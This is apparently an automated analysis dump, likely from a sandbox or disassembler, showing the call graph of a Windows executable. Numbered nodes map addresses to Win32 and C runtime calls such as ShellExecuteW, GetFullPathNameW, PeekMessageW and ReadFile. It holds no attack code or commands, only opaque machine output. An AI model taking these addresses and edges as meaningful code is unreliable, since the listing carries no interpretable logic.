40d5e3 86584->86587 86585->86586 86842 403a50 52 API calls 3 library calls 86586->86842 86739 40f520 86587->86739 86591 40d5fd GetFullPathNameW 86751 401460 86591->86751 86593 40d63b 86594 40d643 86593->86594 86595 42e231 SetCurrentDirectoryW 86593->86595 86596 40d64c 86594->86596 86843 432fee 6 API calls 86594->86843 86595->86594 86766 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86596->86766 86599 42e252 86599->86596 86601 42e25a GetModuleFileNameW 86599->86601 86603 42e274 86601->86603 86604 42e2cb GetForegroundWindow ShellExecuteW 86601->86604 86844 401b10 86603->86844 86607 40d688 86604->86607 86605 40d656 86606 40d669 86605->86606 86840 40e0c0 74 API calls __setmbcp_nolock 86605->86840 86774 4091e0 86606->86774 86613 40d692 SetCurrentDirectoryW 86607->86613 86613->86494 86615 42e28d 86851 40d200 52 API calls 2 library calls 86615->86851 86618 42e299 GetForegroundWindow ShellExecuteW 86619 42e2c6 86618->86619 86619->86607 86620 40ec00 LoadLibraryA GetProcAddress 86620->86485 86622 40d72e 86621->86622 86623 40ebd6 LoadLibraryA 86621->86623 86622->86485 86622->86620 86623->86622 86624 40ebe7 GetProcAddress 86623->86624 86624->86622 86626 4182e0 86625->86626 86627 4182f3 EnterCriticalSection 86625->86627 86633 418209 86626->86633 86627->86570 86629 4182e6 86629->86627 86660 411924 46 API calls 3 library calls 86629->86660 86632->86572 86634 418215 __mtinitlocknum 86633->86634 86635 418225 86634->86635 86636 41823d 86634->86636 86661 418901 46 API calls 2 library calls 86635->86661 86639 416b04 __malloc_crt 45 API calls 86636->86639 86642 41824b __mtinitlocknum 86636->86642 86638 41822a 86662 418752 46 API calls 8 library calls 86638->86662 86641 418256 86639->86641 86644 41825d 86641->86644 86645 41826c 86641->86645 86642->86629 86643 418231 86663 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86643->86663 86664 417f77 46 API calls __getptd_noexit 86644->86664 86646 4182cb __lock 45 API calls 86645->86646 86649 418273 86646->86649 86651 4182a6 86649->86651 86652 41827b InitializeCriticalSectionAndSpinCount 86649->86652 86655 413748 _free 45 API calls 86651->86655 86653 418297 86652->86653 86654 41828b 86652->86654 86666 4182c2 LeaveCriticalSection _doexit 86653->86666 86656 413748 _free 45 API calls 86654->86656 86655->86653 86657 418291 86656->86657 86665 417f77 46 API calls __getptd_noexit 86657->86665 86661->86638 86662->86643 86664->86642 86665->86653 86666->86642 86667->86577 86668->86579 86852 40e6e0 86669->86852 86673 401f41 GetModuleFileNameW 86870 410100 86673->86870 86675 401f5c 86882 410960 86675->86882 86678 401b10 52 API calls 86679 401f81 86678->86679 86885 401980 86679->86885 86681 401f8e 86682 408f40 VariantClear 86681->86682 86683 401f9d 86682->86683 86684 401b10 52 API calls 86683->86684 86685 401fb4 86684->86685 86686 401980 53 API calls 86685->86686 86687 401fc3 86686->86687 86688 401b10 52 API calls 86687->86688 86689 401fd2 86688->86689 86893 40c2c0 86689->86893 86691 401fe1 86692 40bc70 52 API calls 86691->86692 86693 401ff3 86692->86693 86911 401a10 86693->86911 86695 401ffe 86918 4114ab 86695->86918 86698 428b05 86700 401a10 52 API calls 86698->86700 86699 402017 86701 4114ab __wcsicoll 58 API calls 86699->86701 86702 428b18 86700->86702 86703 402022 86701->86703 86705 401a10 52 API calls 86702->86705 86703->86702 86704 40202d 86703->86704 86706 4114ab __wcsicoll 58 API calls 86704->86706 86707 428b33 86705->86707 86708 402038 86706->86708 86710 428b3b GetModuleFileNameW 86707->86710 86709 402043 86708->86709 86708->86710 86711 4114ab __wcsicoll 58 API calls 86709->86711 86712 401a10 52 API calls 86710->86712 86713 40204e 86711->86713 86714 428b6c 86712->86714 86716 428b90 _wcscpy 86713->86716 86719 401a10 52 API calls 86713->86719 86731 402092 86713->86731 86715 40e0a0 52 API calls 86714->86715 86717 428b7a 86715->86717 86725 401a10 52 API calls 86716->86725 86720 401a10 52 API calls 86717->86720 86718 4020a3 86721 428bc6 86718->86721 86926 40e830 53 API calls 86718->86926 86722 402073 _wcscpy 86719->86722 86723 428b88 86720->86723 86729 401a10 52 API calls 86722->86729 86723->86716 86734 4020d0 86725->86734 86726 4020bb 86927 40cf00 53 API calls 86726->86927 86728 4020c6 86730 408f40 VariantClear 86728->86730 86729->86731 86730->86734 86731->86716 86731->86718 86732 402110 86736 408f40 VariantClear 86732->86736 86734->86732 86737 401a10 52 API calls 86734->86737 86928 40cf00 53 API calls 86734->86928 86929 40e6a0 53 API calls 86734->86929 86738 402120 moneypunct 86736->86738 86737->86734 86738->86583 86740 4295c9 __setmbcp_nolock 86739->86740 86741 40f53c 86739->86741 86743 4295d9 GetOpenFileNameW 86740->86743 87608 410120 86741->87608 86743->86741 86745 40d5f5 86743->86745 86744 40f545 87612 4102b0 SHGetMalloc 86744->87612 86745->86591 86745->86593 86747 40f54c 87617 410190 GetFullPathNameW 86747->87617 86749 40f559 87628 40f570 86749->87628 87690 402400 86751->87690 86753 40146f 86756 428c29 _wcscat 86753->86756 87699 401500 86753->87699 86755 40147c 86755->86756 87707 40d440 86755->87707 86758 401489 86758->86756 86759 401491 GetFullPathNameW 86758->86759 86760 402160 52 API calls 86759->86760 86761 4014bb 86760->86761 86762 402160 52 API calls 86761->86762 86763 4014c8 86762->86763 86763->86756 86764 402160 52 API calls 86763->86764 86765 4014ee 86764->86765 86765->86593 86767 428361 86766->86767 86768 4103fc LoadImageW RegisterClassExW 86766->86768 87778 44395e EnumResourceNamesW LoadImageW 86767->87778 87777 410490 7 API calls 86768->87777 86771 428368 86772 40d651 86773 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86772->86773 86773->86605 86775 409202 86774->86775 86776 42d7ad 86774->86776 86834 409216 moneypunct 86775->86834 87915 410940 338 API calls 86775->87915 87918 45e737 90 API calls 3 library calls 86776->87918 86779 409386 86780 40939c 86779->86780 87916 40f190 10 API calls 86779->87916 86780->86607 86841 401000 Shell_NotifyIconW __setmbcp_nolock 86780->86841 86782 4095b2 86782->86780 86784 4095bf 86782->86784 86783 409253 PeekMessageW 86783->86834 87917 401a50 338 API calls 86784->87917 86786 42d8cd Sleep 86786->86834 86787 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86787->86780 86790 4095f9 86787->86790 86789 42e13b 87936 40d410 VariantClear 86789->87936 86793 42e158 TranslateMessage DispatchMessageW GetMessageW 86790->86793 86793->86793 86794 42e188 86793->86794 86794->86780 86796 409567 PeekMessageW 86796->86834 86798 44c29d 52 API calls 86839 4094e0 86798->86839 86799 46f3c1 107 API calls 86799->86834 86800 40e0a0 52 API calls 86800->86834 86801 46fdbf 108 API calls 86801->86839 86802 42dcd2 WaitForSingleObject 86808 42dcf0 GetExitCodeProcess CloseHandle 86802->86808 86802->86834 86803 409551 TranslateMessage DispatchMessageW 86803->86796 86806 42dd3d Sleep 86806->86839 86807 47d33e 316 API calls 86807->86834 87925 40d410 VariantClear 86808->87925 86811 4094cf Sleep 86811->86839 86812 42d94d timeGetTime 87921 465124 53 API calls 86812->87921 86814 40d410 VariantClear 86814->86834 86815 408f40 VariantClear 86815->86839 86817 40c620 timeGetTime 86817->86839 86819 465124 53 API calls 86819->86839 86821 42dd89 CloseHandle 86821->86839 86823 42de19 GetExitCodeProcess CloseHandle 86823->86839 86824 401b10 52 API calls 86824->86839 86827 42de88 Sleep 86827->86834 86830 401980 53 API calls 86830->86839 86831 45e737 90 API calls 86831->86834 86834->86779 86834->86783 86834->86786 86834->86789 86834->86796 86834->86799 86834->86800 86834->86802 86834->86803 86834->86806 86834->86807 86834->86811 86834->86812 86834->86814 86834->86831 86835 42e0cc VariantClear 86834->86835 86836 408f40 VariantClear 86834->86836 86834->86839 87779 4091b0 86834->87779 87837 40afa0 86834->87837 87863 408fc0 86834->87863 87898 408cc0 86834->87898 87912 4096a0 338 API calls 4 library calls 86834->87912 87913 40d150 TranslateAcceleratorW 86834->87913 87914 40d170 IsDialogMessageW GetClassLongW 86834->87914 87919 465124 53 API calls 86834->87919 87920 40c620 timeGetTime 86834->87920 87935 40e270 VariantClear moneypunct 86834->87935 86835->86834 86836->86834 86839->86798 86839->86801 86839->86815 86839->86817 86839->86819 86839->86821 86839->86823 86839->86824 86839->86827 86839->86830 86839->86834 87922 45178a 54 API calls 86839->87922 87923 47d33e 338 API calls 86839->87923 87924 453bc6 54 API calls 86839->87924 87926 40d410 VariantClear 86839->87926 87927 443d19 67 API calls _wcslen 86839->87927 87928 4574b4 VariantClear 86839->87928 87929 403cd0 86839->87929 87933 4731e1 VariantClear 86839->87933 87934 4331a2 6 API calls 86839->87934 86840->86606 86841->86607 86842->86593 86843->86599 86845 401b16 _wcslen 86844->86845 86846 4115d7 52 API calls 86845->86846 86848 401b63 86845->86848 86847 401b4b _memmove 86846->86847 86849 4115d7 52 API calls 86847->86849 86850 40d200 52 API calls 2 library calls 86848->86850 86849->86848 86850->86615 86851->86618 86853 40bc70 52 API calls 86852->86853 86854 401f31 86853->86854 86855 402560 86854->86855 86856 40256d __write_nolock 86855->86856 86857 402160 52 API calls 86856->86857 86859 402593 86857->86859 86869 4025bd 86859->86869 86930 401c90 86859->86930 86860 4026f0 52 API calls 86860->86869 86861 4026a7 86862 401b10 52 API calls 86861->86862 86868 4026db 86861->86868 86864 4026d1 86862->86864 86863 401b10 52 API calls 86863->86869 86934 40d7c0 52 API calls 2 library calls 86864->86934 86866 401c90 52 API calls 86866->86869 86868->86673 86869->86860 86869->86861 86869->86863 86869->86866 86933 40d7c0 52 API calls 2 library calls 86869->86933 86935 40f760 86870->86935 86873 410118 86873->86675 86875 42805d 86876 42806a 86875->86876 86991 431e58 86875->86991 86878 413748 _free 46 API calls 86876->86878 86879 428078 86878->86879 86880 431e58 82 API calls 86879->86880 86881 428084 86880->86881 86881->86675 86883 4115d7 52 API calls 86882->86883 86884 401f74 86883->86884 86884->86678 86886 4019a3 86885->86886 86887 401985 86885->86887 86886->86887 86888 4019b8 86886->86888 86890 40199f 86887->86890 87596 403e10 53 API calls 86887->87596 87597 403e10 53 API calls 86888->87597 86890->86681 86891 4019c4 86891->86681 86894 40c2c7 86893->86894 86895 40c30e 86893->86895 86896 40c2d3 86894->86896 86897 426c79 86894->86897 86898 40c315 86895->86898 86899 426c2b 86895->86899 87598 403ea0 52 API calls __cinit 86896->87598 87603 4534e3 52 API calls 86897->87603 86903 40c321 86898->86903 86904 426c5a 86898->86904 86901 426c4b 86899->86901 86902 426c2e 86899->86902 87601 4534e3 52 API calls 86901->87601 86910 40c2de 86902->86910 87600 4534e3 52 API calls 86902->87600 87599 403ea0 52 API calls __cinit 86903->87599 87602 4534e3 52 API calls 86904->87602 86910->86691 86912 401a30 86911->86912 86913 401a17 86911->86913 86915 402160 52 API calls 86912->86915 86914 401a2d 86913->86914 87604 403c30 52 API calls _memmove 86913->87604 86914->86695 86917 401a3d 86915->86917 86917->86695 86919 411523 86918->86919 86920 4114ba 86918->86920 87607 4113a8 58 API calls 3 library calls 86919->87607 86925 40200c 86920->86925 87605 417f77 46 API calls __getptd_noexit 86920->87605 86923 4114c6 87606 417f25 10 API calls __fptostr 86923->87606 86925->86698 86925->86699 86926->86726 86927->86728 86928->86734 86929->86734 86931 4026f0 52 API calls 86930->86931 86932 401c97 86931->86932 86932->86859 86933->86869 86934->86868 86995 40f6f0 86935->86995 86937 40f77b _strcat moneypunct 87003 40f850 86937->87003 86942 427c2a 87032 414d04 86942->87032 86944 40f7fc 86944->86942 86945 40f804 86944->86945 87019 414a46 86945->87019 86950 40f80e 86950->86873 86954 4528bd 86950->86954 86951 427c59 87038 414fe2 86951->87038 86953 427c79 86955 4150d1 _fseek 81 API calls 86954->86955 86956 452930 86955->86956 87538 452719 86956->87538 86959 452948 86959->86875 86960 414d04 __fread_nolock 61 API calls 86961 452966 86960->86961 86962 414d04 __fread_nolock 61 API calls 86961->86962 86963 452976 86962->86963 86964 414d04 __fread_nolock 61 API calls 86963->86964 86965 45298f 86964->86965 86966 414d04 __fread_nolock 61 API calls 86965->86966 86967 4529aa 86966->86967 86968 4150d1 _fseek 81 API calls 86967->86968 86969 4529c4 86968->86969 86970 4135bb _malloc 46 API calls 86969->86970 86971 4529cf 86970->86971 86972 4135bb _malloc 46 API calls 86971->86972 86973 4529db 86972->86973 86974 414d04 __fread_nolock 61 API calls 86973->86974 86975 4529ec 86974->86975 86976 44afef GetSystemTimeAsFileTime 86975->86976 86977 452a00 86976->86977 86978 452a36 86977->86978 86979 452a13 86977->86979 86981 452aa5 86978->86981 86982 452a3c 86978->86982 86980 413748 _free 46 API calls 86979->86980 86984 452a1c 86980->86984 86983 413748 _free 46 API calls 86981->86983 87544 44b1a9 86982->87544 86986 452aa3 86983->86986 86987 413748 _free 46 API calls 86984->86987 86986->86875 86989 452a25 86987->86989 86988 452a9d 86990 413748 _free 46 API calls 86988->86990 86989->86875 86990->86986 86992 431e64 86991->86992 86993 431e6a 86991->86993 86994 414a46 __fcloseall 82 API calls 86992->86994 86993->86876 86994->86993 86996 425de2 86995->86996 86998 40f6fc _wcslen 86995->86998 86996->86937 86997 40f710 WideCharToMultiByte 86999 40f756 86997->86999 87000 40f728 86997->87000 86998->86997 86999->86937 87001 4115d7 52 API calls 87000->87001 87002 40f735 WideCharToMultiByte 87001->87002 87002->86937 87005 40f85d __setmbcp_nolock _strlen 87003->87005 87006 40f7ab 87005->87006 87051 414db8 87005->87051 87007 4149c2 87006->87007 87066 414904 87007->87066 87009 40f7e9 87009->86942 87010 40f5c0 87009->87010 87011 40f5cd _strcat __write_nolock _memmove 87010->87011 87012 414d04 __fread_nolock 61 API calls 87011->87012 87013 40f691 __tzset_nolock 87011->87013 87015 425d11 87011->87015 87154 4150d1 87011->87154 87012->87011 87013->86944 87016 4150d1 _fseek 81 API calls 87015->87016 87017 425d33 87016->87017 87018 414d04 __fread_nolock 61 API calls 87017->87018 87018->87013 87020 414a52 __mtinitlocknum 87019->87020 87021 414a64 87020->87021 87022 414a79 87020->87022 87294 417f77 46 API calls __getptd_noexit 87021->87294 87025 415471 __lock_file 47 API calls 87022->87025 87030 414a74 __mtinitlocknum 87022->87030 87024 414a69 87295 417f25 10 API calls __fptostr 87024->87295 87026 414a92 87025->87026 87278 4149d9 87026->87278 87030->86950 87363 414c76 87032->87363 87034 414d1c 87035 44afef 87034->87035 87531 442c5a 87035->87531 87037 44b00d 87037->86951 87039 414fee __mtinitlocknum 87038->87039 87040 414ffa 87039->87040 87041 41500f 87039->87041 87535 417f77 46 API calls __getptd_noexit 87040->87535 87043 415471 __lock_file 47 API calls 87041->87043 87045 415017 87043->87045 87044 414fff 87536 417f25 10 API calls __fptostr 87044->87536 87047 414e4e __ftell_nolock 51 API calls 87045->87047 87048 415024 87047->87048 87537 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 87048->87537 87050 41500a __mtinitlocknum 87050->86953 87052 414dd6 87051->87052 87053 414deb 87051->87053 87062 417f77 46 API calls __getptd_noexit 87052->87062 87053->87052 87055 414df2 87053->87055 87064 41b91b 79 API calls 12 library calls 87055->87064 87056 414ddb 87063 417f25 10 API calls __fptostr 87056->87063 87059 414e18 87060 414de6 87059->87060 87065 418f98 77 API calls 5 library calls 87059->87065 87060->87005 87062->87056 87063->87060 87064->87059 87065->87060 87069 414910 __mtinitlocknum 87066->87069 87067 414923 87122 417f77 46 API calls __getptd_noexit 87067->87122 87069->87067 87070 414951 87069->87070 87085 41d4d1 87070->87085 87071 414928 87123 417f25 10 API calls __fptostr 87071->87123 87074 414956 87075 41496a 87074->87075 87076 41495d 87074->87076 87078 414992 87075->87078 87079 414972 87075->87079 87124 417f77 46 API calls __getptd_noexit 87076->87124 87102 41d218 87078->87102 87125 417f77 46 API calls __getptd_noexit 87079->87125 87080 414933 __mtinitlocknum @_EH4_CallFilterFunc@8 87080->87009 87086 41d4dd __mtinitlocknum 87085->87086 87087 4182cb __lock 46 API calls 87086->87087 87088 41d4eb 87087->87088 87089 41d567 87088->87089 87097 418209 __mtinitlocknum 46 API calls 87088->87097 87100 41d560 87088->87100 87130 4154b2 47 API calls __lock 87088->87130 87131 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87088->87131 87091 416b04 __malloc_crt 46 API calls 87089->87091 87092 41d56e 87091->87092 87094 41d57c InitializeCriticalSectionAndSpinCount 87092->87094 87092->87100 87093 41d5f0 __mtinitlocknum 87093->87074 87095 41d59c 87094->87095 87096 41d5af EnterCriticalSection 87094->87096 87099 413748 _free 46 API calls 87095->87099 87096->87100 87097->87088 87099->87100 87127 41d5fb 87100->87127 87103 41d23a 87102->87103 87104 41d255 87103->87104 87116 41d26c __wopenfile 87103->87116 87136 417f77 46 API calls __getptd_noexit 87104->87136 87105 41d421 87108 41d47a 87105->87108 87109 41d48c 87105->87109 87107 41d25a 87137 417f25 10 API calls __fptostr 87107->87137 87141 417f77 46 API calls __getptd_noexit 87108->87141 87133 422bf9 87109->87133 87113 41d47f 87142 417f25 10 API calls __fptostr 87113->87142 87114 41499d 87126 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 87114->87126 87116->87105 87116->87108 87138 41341f 58 API calls 2 library calls 87116->87138 87118 41d41a 87118->87105 87139 41341f 58 API calls 2 library calls 87118->87139 87120 41d439 87120->87105 87140 41341f 58 API calls 2 library calls 87120->87140 87122->87071 87123->87080 87124->87080 87125->87080 87126->87080 87132 4181f2 LeaveCriticalSection 87127->87132 87129 41d602 87129->87093 87130->87088 87131->87088 87132->87129 87143 422b35 87133->87143 87135 422c14 87135->87114 87136->87107 87137->87114 87138->87118 87139->87120 87140->87105 87141->87113 87142->87114 87145 422b41 __mtinitlocknum 87143->87145 87144 422b54 87146 417f77 __fptostr 46 API calls 87144->87146 87145->87144 87147 422b8a 87145->87147 87148 422b59 87146->87148 87149 422400 __tsopen_nolock 109 API calls 87147->87149 87150 417f25 __fptostr 10 API calls 87148->87150 87151 422ba4 87149->87151 87153 422b63 __mtinitlocknum 87150->87153 87152 422bcb __wsopen_helper LeaveCriticalSection 87151->87152 87152->87153 87153->87135 87157 4150dd __mtinitlocknum 87154->87157 87155 4150e9 87185 417f77 46 API calls __getptd_noexit 87155->87185 87157->87155 87158 41510f 87157->87158 87167 415471 87158->87167 87159 4150ee 87186 417f25 10 API calls __fptostr 87159->87186 87166 4150f9 __mtinitlocknum 87166->87011 87168 415483 87167->87168 87169 4154a5 EnterCriticalSection 87167->87169 87168->87169 87170 41548b 87168->87170 87172 415117 87169->87172 87171 4182cb __lock 46 API calls 87170->87171 87171->87172 87173 415047 87172->87173 87174 415067 87173->87174 87175 415057 87173->87175 87180 415079 87174->87180 87188 414e4e 87174->87188 87243 417f77 46 API calls __getptd_noexit 87175->87243 87179 41505c 87187 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 87179->87187 87205 41443c 87180->87205 87183 4150b9 87218 41e1f4 87183->87218 87185->87159 87186->87166 87187->87166 87189 414e61 87188->87189 87190 414e79 87188->87190 87244 417f77 46 API calls __getptd_noexit 87189->87244 87191 414139 __flswbuf 46 API calls 87190->87191 87193 414e80 87191->87193 87196 41e1f4 __write 51 API calls 87193->87196 87194 414e66 87245 417f25 10 API calls __fptostr 87194->87245 87198 414e97 87196->87198 87197 414e71 87197->87180 87198->87197 87199 414f09 87198->87199 87201 414ec9 87198->87201 87246 417f77 46 API calls __getptd_noexit 87199->87246 87201->87197 87202 41e1f4 __write 51 API calls 87201->87202 87203 414f64 87202->87203 87203->87197 87204 41e1f4 __write 51 API calls 87203->87204 87204->87197 87206 414455 87205->87206 87210 414477 87205->87210 87207 414139 __flswbuf 46 API calls 87206->87207 87206->87210 87208 414470 87207->87208 87247 41b7b2 77 API calls 6 library calls 87208->87247 87211 414139 87210->87211 87212 414145 87211->87212 87213 41415a 87211->87213 87248 417f77 46 API calls __getptd_noexit 87212->87248 87213->87183 87215 41414a 87249 417f25 10 API calls __fptostr 87215->87249 87217 414155 87217->87183 87219 41e200 __mtinitlocknum 87218->87219 87220 41e223 87219->87220 87221 41e208 87219->87221 87223 41e22f 87220->87223 87227 41e269 87220->87227 87270 417f8a 46 API calls __getptd_noexit 87221->87270 87272 417f8a 46 API calls __getptd_noexit 87223->87272 87224 41e20d 87271 417f77 46 API calls __getptd_noexit 87224->87271 87226 41e234 87273 417f77 46 API calls __getptd_noexit 87226->87273 87250 41ae56 87227->87250 87231 41e23c 87274 417f25 10 API calls __fptostr 87231->87274 87232 41e26f 87234 41e291 87232->87234 87235 41e27d 87232->87235 87275 417f77 46 API calls __getptd_noexit 87234->87275 87260 41e17f 87235->87260 87236 41e215 __mtinitlocknum 87236->87179 87239 41e289 87277 41e2c0 LeaveCriticalSection __unlock_fhandle 87239->87277 87240 41e296 87276 417f8a 46 API calls __getptd_noexit 87240->87276 87243->87179 87244->87194 87245->87197 87246->87197 87247->87210 87248->87215 87249->87217 87251 41ae62 __mtinitlocknum 87250->87251 87252 41aebc 87251->87252 87253 4182cb __lock 46 API calls 87251->87253 87254 41aec1 EnterCriticalSection 87252->87254 87257 41aede __mtinitlocknum 87252->87257 87255 41ae8e 87253->87255 87254->87257 87256 41ae97 InitializeCriticalSectionAndSpinCount 87255->87256 87258 41aeaa 87255->87258 87256->87258 87257->87232 87259 41aeec ___lock_fhandle LeaveCriticalSection 87258->87259 87259->87252 87261 41aded __chsize_nolock 46 API calls 87260->87261 87262 41e18e 87261->87262 87263 41e1a4 SetFilePointer 87262->87263 87264 41e194 87262->87264 87266 41e1c3 87263->87266 87267 41e1bb GetLastError 87263->87267 87265 417f77 __fptostr 46 API calls 87264->87265 87268 41e199 87265->87268 87266->87268 87269 417f9d __dosmaperr 46 API calls 87266->87269 87267->87266 87268->87239 87269->87268 87270->87224 87271->87236 87272->87226 87273->87231 87274->87236 87275->87240 87276->87239 87277->87236 87279 4149ea 87278->87279 87281 4149fe 87278->87281 87324 417f77 46 API calls __getptd_noexit 87279->87324 87282 4149fa 87281->87282 87284 41443c __flush 77 API calls 87281->87284 87296 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 87282->87296 87283 4149ef 87325 417f25 10 API calls __fptostr 87283->87325 87286 414a0a 87284->87286 87297 41d8c2 87286->87297 87289 414139 __flswbuf 46 API calls 87290 414a18 87289->87290 87301 41d7fe 87290->87301 87292 414a1e 87292->87282 87293 413748 _free 46 API calls 87292->87293 87293->87282 87294->87024 87295->87030 87296->87030 87298 41d8d2 87297->87298 87300 414a12 87297->87300 87299 413748 _free 46 API calls 87298->87299 87298->87300 87299->87300 87300->87289 87302 41d80a __mtinitlocknum 87301->87302 87303 41d812 87302->87303 87304 41d82d 87302->87304 87341 417f8a 46 API calls __getptd_noexit 87303->87341 87305 41d839 87304->87305 87310 41d873 87304->87310 87343 417f8a 46 API calls __getptd_noexit 87305->87343 87308 41d817 87342 417f77 46 API calls __getptd_noexit 87308->87342 87309 41d83e 87344 417f77 46 API calls __getptd_noexit 87309->87344 87313 41ae56 ___lock_fhandle 48 API calls 87310->87313 87315 41d879 87313->87315 87314 41d846 87345 417f25 10 API calls __fptostr 87314->87345 87317 41d893 87315->87317 87318 41d887 87315->87318 87346 417f77 46 API calls __getptd_noexit 87317->87346 87326 41d762 87318->87326 87321 41d81f __mtinitlocknum 87321->87292 87322 41d88d 87347 41d8ba LeaveCriticalSection __unlock_fhandle 87322->87347 87324->87283 87325->87282 87348 41aded 87326->87348 87328 41d7c8 87361 41ad67 47 API calls 2 library calls 87328->87361 87329 41d772 87329->87328 87330 41d7a6 87329->87330 87332 41aded __chsize_nolock 46 API calls 87329->87332 87330->87328 87333 41aded __chsize_nolock 46 API calls 87330->87333 87335 41d79d 87332->87335 87336 41d7b2 CloseHandle 87333->87336 87334 41d7d0 87337 41d7f2 87334->87337 87362 417f9d 46 API calls 3 library calls 87334->87362 87339 41aded __chsize_nolock 46 API calls 87335->87339 87336->87328 87340 41d7be GetLastError 87336->87340 87337->87322 87339->87330 87340->87328 87341->87308 87342->87321 87343->87309 87344->87314 87345->87321 87346->87322 87347->87321 87349 41adfa 87348->87349 87351 41ae12 87348->87351 87350 417f8a __free_osfhnd 46 API calls 87349->87350 87353 41adff 87350->87353 87352 417f8a __free_osfhnd 46 API calls 87351->87352 87355 41ae51 87351->87355 87354 41ae23 87352->87354 87356 417f77 __fptostr 46 API calls 87353->87356 87357 417f77 __fptostr 46 API calls 87354->87357 87355->87329 87358 41ae07 87356->87358 87359 41ae2b 87357->87359 87358->87329 87360 417f25 __fptostr 10 API calls 87359->87360 87360->87358 87361->87334 87362->87337 87364 414c82 __mtinitlocknum 87363->87364 87365 414cc3 87364->87365 87366 414c96 __setmbcp_nolock 87364->87366 87367 414cbb __mtinitlocknum 87364->87367 87368 415471 __lock_file 47 API calls 87365->87368 87390 417f77 46 API calls __getptd_noexit 87366->87390 87367->87034 87370 414ccb 87368->87370 87376 414aba 87370->87376 87371 414cb0 87391 417f25 10 API calls __fptostr 87371->87391 87377 414af2 87376->87377 87380 414ad8 __setmbcp_nolock 87376->87380 87392 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 87377->87392 87378 414ae2 87443 417f77 46 API calls __getptd_noexit 87378->87443 87380->87377 87380->87378 87383 414b2d 87380->87383 87383->87377 87384 414c38 __setmbcp_nolock 87383->87384 87385 414139 __flswbuf 46 API calls 87383->87385 87393 41dfcc 87383->87393 87423 41d8f3 87383->87423 87445 41e0c2 46 API calls 3 library calls 87383->87445 87446 417f77 46 API calls __getptd_noexit 87384->87446 87385->87383 87389 414ae7 87444 417f25 10 API calls __fptostr 87389->87444 87390->87371 87391->87367 87392->87367 87394 41dfd8 __mtinitlocknum 87393->87394 87395 41dfe0 87394->87395 87396 41dffb 87394->87396 87516 417f8a 46 API calls __getptd_noexit 87395->87516 87398 41e007 87396->87398 87402 41e041 87396->87402 87518 417f8a 46 API calls __getptd_noexit 87398->87518 87400 41dfe5 87517 417f77 46 API calls __getptd_noexit 87400->87517 87401 41e00c 87519 417f77 46 API calls __getptd_noexit 87401->87519 87405 41e063 87402->87405 87406 41e04e 87402->87406 87409 41ae56 ___lock_fhandle 48 API calls 87405->87409 87521 417f8a 46 API calls __getptd_noexit 87406->87521 87407 41e014 87520 417f25 10 API calls __fptostr 87407->87520 87410 41e069 87409->87410 87412 41e077 87410->87412 87413 41e08b 87410->87413 87411 41e053 87522 417f77 46 API calls __getptd_noexit 87411->87522 87447 41da15 87412->87447 87523 417f77 46 API calls __getptd_noexit 87413->87523 87416 41dfed __mtinitlocknum 87416->87383 87419 41e083 87525 41e0ba LeaveCriticalSection __unlock_fhandle 87419->87525 87420 41e090 87524 417f8a 46 API calls __getptd_noexit 87420->87524 87424 41d900 87423->87424 87428 41d915 87423->87428 87529 417f77 46 API calls __getptd_noexit 87424->87529 87426 41d905 87530 417f25 10 API calls __fptostr 87426->87530 87429 41d94a 87428->87429 87434 41d910 87428->87434 87526 420603 87428->87526 87431 414139 __flswbuf 46 API calls 87429->87431 87432 41d95e 87431->87432 87433 41dfcc __read 59 API calls 87432->87433 87435 41d965 87433->87435 87434->87383 87435->87434 87436 414139 __flswbuf 46 API calls 87435->87436 87437 41d988 87436->87437 87437->87434 87438 414139 __flswbuf 46 API calls 87437->87438 87439 41d994 87438->87439 87439->87434 87440 414139 __flswbuf 46 API calls 87439->87440 87441 41d9a1 87440->87441 87442 414139 __flswbuf 46 API calls 87441->87442 87442->87434 87443->87389 87444->87377 87445->87383 87446->87389 87448 41da31 87447->87448 87449 41da4c 87447->87449 87450 417f8a __free_osfhnd 46 API calls 87448->87450 87451 41da5b 87449->87451 87453 41da7a 87449->87453 87452 41da36 87450->87452 87454 417f8a __free_osfhnd 46 API calls 87451->87454 87456 417f77 __fptostr 46 API calls 87452->87456 87455 41da98 87453->87455 87470 41daac 87453->87470 87457 41da60 87454->87457 87458 417f8a __free_osfhnd 46 API calls 87455->87458 87467 41da3e 87456->87467 87460 417f77 __fptostr 46 API calls 87457->87460 87462 41da9d 87458->87462 87459 41db02 87461 417f8a __free_osfhnd 46 API calls 87459->87461 87463 41da67 87460->87463 87465 41db07 87461->87465 87466 417f77 __fptostr 46 API calls 87462->87466 87464 417f25 __fptostr 10 API calls 87463->87464 87464->87467 87468 417f77 __fptostr 46 API calls 87465->87468 87469 41daa4 87466->87469 87467->87419 87468->87469 87473 417f25 __fptostr 10 API calls 87469->87473 87470->87459 87470->87467 87471 41dae1 87470->87471 87472 41db1b 87470->87472 87471->87459 87478 41daec ReadFile 87471->87478 87475 416b04 __malloc_crt 46 API calls 87472->87475 87473->87467 87479 41db31 87475->87479 87476 41dc17 87477 41df8f GetLastError 87476->87477 87485 41dc2b 87476->87485 87480 41de16 87477->87480 87481 41df9c 87477->87481 87478->87476 87478->87477 87482 41db59 87479->87482 87483 41db3b 87479->87483 87489 417f9d __dosmaperr 46 API calls 87480->87489 87495 41dd9b 87480->87495 87487 417f77 __fptostr 46 API calls 87481->87487 87486 420494 __lseeki64_nolock 48 API calls 87482->87486 87484 417f77 __fptostr 46 API calls 87483->87484 87488 41db40 87484->87488 87485->87495 87496 41dc47 87485->87496 87499 41de5b 87485->87499 87490 41db67 87486->87490 87491 41dfa1 87487->87491 87493 417f8a __free_osfhnd 46 API calls 87488->87493 87489->87495 87490->87478 87492 417f8a __free_osfhnd 46 API calls 87491->87492 87492->87495 87493->87467 87494 413748 _free 46 API calls 87494->87467 87495->87467 87495->87494 87497 41dcab ReadFile 87496->87497 87506 41dd28 87496->87506 87500 41dcc9 GetLastError 87497->87500 87508 41dcd3 87497->87508 87498 41ded0 ReadFile 87501 41deef GetLastError 87498->87501 87509 41def9 87498->87509 87499->87495 87499->87498 87500->87496 87500->87508 87501->87499 87501->87509 87502 41ddec MultiByteToWideChar 